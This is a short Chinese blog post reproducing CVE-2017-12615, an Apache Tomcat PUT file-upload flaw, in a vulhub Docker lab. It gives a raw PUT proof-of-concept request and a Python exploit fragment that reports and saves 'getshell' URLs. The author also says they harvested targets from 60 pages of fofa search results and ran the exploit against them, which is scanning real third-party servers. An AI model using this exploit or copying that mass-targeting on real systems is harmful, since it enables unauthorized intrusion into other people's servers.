CVE-2017-12615复现
前言
好久没复现过vulhub里的漏洞了,昨天晚上复现了一个。现在记录一下
复现的是CVE+2017-12615
漏洞介绍
利用条件:
Apache Tomcat允许PUT上传
允许写入文件
Vulhub - Docker-Compose file for vulnerability environment
进入对应的文件夹执行
docker-compose build
docker-compose up -d
访问如下
开burp刷新发送POC
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
shell
返回状态码为201即为上传成功
构造exp
rqt=requests.put(url=url+'{}'.format(self.path),data=self.data,headers=self.headers,timeout=3)
if rqt.status_code==201:
print('[+] getshell成功:{}'.format(rqt.url))
print('[+] getshell成功:{}'.format(rqt.url),file=open('save.txt','a'))
代码地址:https://github.com/422926799/python/tree/master/CVE-2017-12615
效果不咋滴,估计都修复了。从fofa爬了60页没一个成的
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。
文章标题:CVE-2017-12615复现
本文作者:九世
发布时间:2019-08-15, 10:08:24
最后更新:2019-08-15, 13:08:21
原始链接:http://jiushill.github.io/posts/310ec487.html版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。